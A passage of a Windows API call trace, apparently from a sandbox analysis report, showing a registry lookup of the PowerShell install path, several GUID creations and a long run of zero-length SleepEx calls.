lpcbData=0x6fbf434*=0x0 | out: lpType=0x6fbf438*=0x1, lpData=0x0, lpcbData=0x6fbf434*=0x56) returned 0x0 [0249.217] RegQueryValueExW (in: hKey=0x758, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6fbf438, lpData=0x4cce26c, lpcbData=0x6fbf434*=0x56 | out: lpType=0x6fbf438*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6fbf434*=0x56) returned 0x0 [0249.217] RegCloseKey (hKey=0x758) returned 0x0 [0249.217] CoCreateGuid (in: pguid=0x6fbf3c0 | out: pguid=0x6fbf3c0*(Data1=0xc1e4a9e, Data2=0xbf55, Data3=0x428c, Data4=([0]=0x8f, [1]=0x89, [2]=0xb6, [3]=0x24, [4]=0x64, [5]=0x3f, [6]=0x85, [7]=0x8b))) returned 0x0 [0249.217] CoCreateGuid (in: pguid=0x6fbf3c0 | out: pguid=0x6fbf3c0*(Data1=0x33927597, Data2=0xb89d, Data3=0x43ea, Data4=([0]=0x96, [1]=0x49, [2]=0x12, [3]=0xbc, [4]=0xb4, [5]=0xe5, [6]=0xdf, [7]=0x22))) returned 0x0 [0249.217] CoCreateGuid (in: pguid=0x6fbf3c0 | out: pguid=0x6fbf3c0*(Data1=0xb98e2012, Data2=0x2c6d, Data3=0x4415, Data4=([0]=0x85, [1]=0xa8, [2]=0xb, [3]=0xd5, [4]=0xc1, [5]=0x80, [6]=0x9b, [7]=0x7f))) returned 0x0 [0249.217] CoCreateGuid (in: pguid=0x6fbf3c0 | out: pguid=0x6fbf3c0*(Data1=0xcd529cbb, Data2=0xab77, Data3=0x4063, Data4=([0]=0xa5, [1]=0x38, [2]=0xde, [3]=0x91, [4]=0x2c, [5]=0xb7, [6]=0x25, [7]=0x80))) returned 0x0 [0249.217] CoCreateGuid (in: pguid=0x6fbf3c0 | out: pguid=0x6fbf3c0*(Data1=0xe6c6aa84, Data2=0xe0e6, Data3=0x49a5, Data4=([0]=0xab, [1]=0xd7, [2]=0xcc, [3]=0x51, [4]=0xb0, [5]=0x1c, [6]=0x66, [7]=0xd9))) returned 0x0 [0249.217] CoCreateGuid (in: pguid=0x6fbf3c0 | out: pguid=0x6fbf3c0*(Data1=0xf24b1591, Data2=0xaf1b, Data3=0x4f4f, Data4=([0]=0x90, [1]=0x23, [2]=0x1f, [3]=0x70, [4]=0xff, [5]=0x37, [6]=0x3, [7]=0xe3))) returned 0x0 [0249.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.286] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.359] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.711] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.758] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.805] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.898] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.261] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.305] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.399] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.476] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.476] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.486] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.384] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.416] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.451] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.461] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.468] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.468] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.471] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.471] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.570] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.572] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.591] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.677] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.698] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.867] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.870] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.895] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.898] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.973] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.983] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.080] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.108] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.110] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.118] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.124] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.126] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.134] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.139] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.146] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.168] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.191] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.229] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.243] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.243] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.276] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.287] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.302] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.303] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.310] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.311] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.316] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.318] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.321] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.325] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.336] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.354] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.377] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.413] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.432] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.434] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.456] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.768] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.817] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.849] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.856] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.858] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.864] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.869] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.897] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.911] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.919] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.934] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.935] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.948] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.960] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.978] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.981] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.065] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.069] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.119] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.119] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.120] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.120] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.126] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.128] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0258.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.310] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.337] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.418] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.436] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.437] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.480] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.515] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.524] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.537] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.579] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.594] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.858] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.913] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.027] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.036] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.047] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.049] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.055] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.056] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.057] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.058] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.064] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.080] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.086] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.197] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.234] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.380] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.426] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.465] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.484] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.486] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.491] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.492] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.507] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.524] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.546] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.571] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.596] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.676] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.703] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.708] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.722] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.761] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.797] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.797] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.800] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.815] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.843] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.874] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.911] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.962] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.021] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.153] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.181] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.200] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.218] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.326] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.347] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.502] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.521] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.527] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.540] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.558] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.566] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.582] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.590] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.594] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.605] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.618] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.639] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.965] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.968] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.988] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.055] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.056] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.076] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.176] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.177] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.213] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.223] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.259] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.292] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.402] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.447] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.072] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.353] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.356] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.361] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.376] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.413] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.431] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.498] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.526] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.541] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.567] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.699] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.801] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.842] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.846] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.847] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.849] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.855] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.880] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.938] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.032] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.080] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.159] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.221] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.238] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.239] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.244] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.245] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.260] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.398] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.408] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.424] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.428] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.436] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.474] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.549] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0288.550] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.728] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.750] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.753] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.764] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.795] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.852] SleepEx (dwMilliseconds=0x0, bAlertable=0) 